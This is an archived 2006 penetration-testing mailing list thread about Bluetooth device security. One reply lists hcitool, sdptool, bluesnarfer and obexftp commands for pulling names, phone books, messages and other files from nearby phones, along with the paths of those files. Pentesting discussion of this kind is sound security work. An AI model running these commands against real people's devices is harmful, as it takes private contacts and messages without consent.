Home page logo
/

pen-test logo Penetration Testing mailing list archives

SV: Bluetooth Pentesting?
From: "Martin Gustafsson" <gustafsson.martin () bredband net>
Date: Tue, 22 Aug 2006 22:27:41 +0200


Hi,

The car stereo trick can be done using carwhisperer (see Trifinites page).

I have not been monitoring bluetooth security for the last year, but here
are some commands you can run. Do not expect to find any major holes on a
new phone though...


COMMANDS:

hcitool info $BD_ADDR 

hcitool name $BD_ADDR 

sdptool browse $BD_ADDR 

sdptool browse --tree $BD_ADDR 

Snarf name and serial
bluesnarfer -i -b $BD_ADDR 

Snarf phone books
bluesnarfer -l -b $BD_ADDR 

Try to FTP files
obexftp -b $BD_ADDR -B $channel -g $file

The FTP channel is labeld "OBEX Object Push" when you run "sdptool browse"

Files I have found to be valid on different phones
telecom/cal.vcs
telecom/cal/###.vcs
telecom/cal/info.log
telecom/devinfo.txt
telecom/folderlisting
telecom/inmsg.vmg
telecom/note.vnt
telecom/outmsg.vmg
telecom/pb.vcf
telecom/pb/###.vcf
telecom/pb/0.vcf
telecom/pb/1.vcf
telecom/pb/info.log
telecom/push.txt
telecom/rtc.txt
telecom/sentmsg.vm
telecom/something.jph

Scan RFCOMM channels
rfcomm_scan $BD_ADDR 

Scan 30 000 PSM ports (takes LONG time)
psm_scan $BD_ADDR 
        




SOME LINKS:

Bluesweep:
http://www.airmagnet.com/products/bluesweep.htm

BLUETOOTH SECURITY TOOLS
http://student.vub.ac.be/~sijansse/2e%20lic/BT/Tools/Tools.html

Bluescanner
http://www.networkchemistry.com/products/bluescanner.php

Bluetooth projects
http://www.alighieri.org/project.html

Bluesniping
http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

Bluetooth device security database
http://www.betaversion.net/btdsd/

BTscanner
http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=downloads

Bluetooth advisories and "Greenplaque"
http://www.digitalmunition.com/

Backtrack (Bootable pentest dist) got a bunch of bluetooth tools.
http://www.remote-exploit.org/index.php/BackTrack

Bluetooth tools
http://www.securitywireless.info/Downloads-index-req-viewdownload-cid-18.htm
l

Bluetest.pl
http://www.syss.de/links.html

Trifinite tools
http://trifinite.org/trifinite_downloads.html


Regards,
Martin Gustafsson
CISSP


-----Ursprungligt meddelande-----
Från: Robert D. Holtz [mailto:robert.d.holtz () gmail com] 
Skickat: den 22 augusti 2006 02:49
Till: steven () lovebug org; pen-test () securityfocus com
Ämne: RE: Bluetooth Pentesting?

Here's an interesting article on Blue tooth security:

http://ntrg.cs.tcd.ie/undergrad/4ba2.05/group15/index.html

There was also a story circulating awhile back about the ability to transmit
radio directly into someone's car stereo with a directional antenna.  I'm
sorry that I can't recall the details but I found it amusing that you can
mess with someone by having whatever you want coming out their radio ... not
truly a "real" security issue but amusing none the less.

-----Original Message-----
From: steven () lovebug org [mailto:steven () lovebug org]
Sent: Monday, August 21, 2006 3:06 PM
To: pen-test () securityfocus com
Subject: Bluetooth Pentesting?

Greetings,

Does anyone on this list do bluetooth pentesting?  I have read tons of old
posts and found plenty of tools to do a few different things.  However, I do
not find any of it to be overly useful.  Most of the tools out there seem to
be aimed at certain cell phones or are very specific.  I am trying to find
out what the risks are of all kinds of devices.  I have found btscanner to
be pretty good at detecting devices but it doesn't do too much other than
detect it.  I can scan and pickup 150+ devices and the Vulnerable to:
section is always the same.. blank.  Are all the bluetooth devices I find so
super secure?  I pick up cars, phones, PDAs, computers, keyboards, etc.  Are
there really no risks with these devices?

Is there a better/good tool out there that can really find various bluetooth
devices and tell me what -real- risks might be associated with them -- on
top of that.. is there a good tool for trying to pull data or use these
devices?  Example: a dell or mac laptop has bluetooth on, or a Treo with it
on.. what are the possible risks?  What tools can actually test if
authentication is required for connecting with these devices.. or whether I
can bruteforce it or connect at all?

Any suggestions would be greatly appreciate and I am really trying to do
something more than just "detect" bluetooth devices.  I need to know if
there are risks here.

Thanks


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]